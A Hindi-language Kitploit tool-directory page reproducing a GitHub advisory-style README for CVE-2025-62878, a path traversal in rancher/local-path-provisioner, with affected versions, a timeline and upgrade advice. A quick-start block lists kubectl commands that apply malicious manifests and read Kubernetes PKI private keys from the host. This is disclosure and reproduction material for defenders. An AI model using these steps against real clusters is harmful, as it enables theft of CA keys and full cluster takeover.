Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-62878 — CVE-2025-62878 | Kitploit
उपकरण/GitHubGitHub/kinokopio/cve-2025-62878
कंटेनर सुरक्षाभेद्यता विश्लेषणशोषणक्लाउड सुरक्षागलत कॉन्फ़िगरेशनलर्निंग और शिक्षालैब और अभ्यास
GitHubkinokopio/cve-2025-62878

CVE-2025-62878

CVE-2025-62878

रिपॉजिटरी देखें
136 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

CVE-2025-62878: स्थानीय पथ प्रावधानकर्ता पथ ट्रैवर्सल

अवलोकन

आइटममान
CVE IDCVE-2025-62878
GHSA IDGHSA-jr3w-9vfr-c746
गंभीरतागंभीर (CVSS 10.0)
CWECWE-23 (सापेक्ष पथ ट्रैवर्सल)
प्रभावित घटकrancher/local-path-provisioner
प्रभावित संस्करणv0.0.27 ~ v0.0.32
स्थिर संस्करणv0.0.33+

कमज़ोरी का विवरण

StorageClass के pathPattern पैरामीटर में एक पथ ट्रैवर्सल कमज़ोरी मौजूद है। एक दुर्भावनापूर्ण उपयोगकर्ता सापेक्ष पथ तत्वों (जैसे, ../) का उपयोग करके pathPattern में हेरफेर कर सकता है, जिससे होस्ट नोड पर मनमाने स्थानों को इंगित करने वाले PersistentVolumes बनाए जा सकते हैं, और कॉन्फ़िगर किए गए बेस डायरेक्टरी प्रतिबंध को दरकिनार किया जा सकता है।

यह हमलावरों को अनुमति देता है:

  • संवेदनशील होस्ट फ़ाइलों तक पहुँचना (जैसे, /etc/kubernetes/pki/)
  • महत्वपूर्ण सिस्टम फ़ाइलों को अधिलेखित करना
  • Kubernetes CA निजी कुंजियाँ चुराकर पूर्ण क्लस्टर समझौता प्राप्त करना

प्रभावित संस्करण (सत्यापित)

नोट: आधिकारिक GitHub Advisory में कहा गया है कि "< 0.0.34" प्रभावित है, लेकिन हमारे परीक्षण पुष्टि करते हैं:

  • v0.0.33 पहले से ही पैच किया गया है
  • v0.0.26 और इससे पहले के संस्करण प्रभावित नहीं हैं (pathPattern सुविधा मौजूद नहीं है)
  • वास्तविक प्रभावित सीमा: v0.0.27 <= संस्करण <= v0.0.32

समयरेखा

घटनातारीख
pathPattern सुविधा शुरू की गई2024-05-26 (कमिट af85381)
पहला कमज़ोर रिलीज़ (v0.0.27)2024-05-29

पुनरुत्पादन

विस्तृत पुनरुत्पादन चरणों और स्क्रिप्ट के लिए exploit/ निर्देशिका देखें।

त्वरित प्रारंभ

root@kitploit:~
# 1. कमज़ोर संस्करण स्थापित करें
kubectl apply -f https://raw.githubusercontent.com/rancher/local-path-provisioner/v0.0.30/deploy/local-path-storage.yaml

# 2. एक्सप्लॉइट लागू करें
kubectl apply -f exploit/malicious-storageclass.yaml
kubectl apply -f exploit/malicious-pvc.yaml
kubectl apply -f exploit/exploit-pod.yaml

# 3. शोषण सत्यापित करें
kubectl get pv -o jsonpath='{.items[0].spec.hostPath.path}'
# आउटपुट: /etc/kubernetes/pki

kubectl exec pki-exploit-pod -- ls -la /stolen-pki/
# Kubernetes PKI प्रमाणपत्र और निजी कुंजियाँ दिखाता है

उपचार

v0.0.33 या बाद के संस्करण में अपग्रेड करें:

root@kitploit:~
kubectl apply -f https://raw.githubusercontent.com/rancher/local-path-provisioner/v0.0.33/deploy/local-path-storage.yaml

संदर्भ

  • GitHub Advisory GHSA-jr3w-9vfr-c746
  • फिक्स कमिट 1ed6b54
  • pathPattern फीचर कमिट af85381
टूल डाउनलोड करें
संस्करणरिलीज़ तिथिpathPattern समर्थनकमज़ोर
v0.0.262023-12-03नहींसुरक्षित (सुविधा मौजूद नहीं)
v0.0.272024-05-29हाँकमज़ोर
v0.0.282024-06-19हाँकमज़ोर
v0.0.292024-09-03हाँकमज़ोर
v0.0.302024-10-07हाँकमज़ोर
v0.0.312025-01-24हाँकमज़ोर
v0.0.322025-07-31हाँकमज़ोर
v0.0.332025-12-25हाँस्थिर
v0.0.342026-01-06हाँस्थिर
फिक्स कमिट
2025-12-24 (कमिट 1ed6b54)
पहला पैच किया गया रिलीज़ (v0.0.33)2025-12-25
CVE प्रकाशित2026-02-04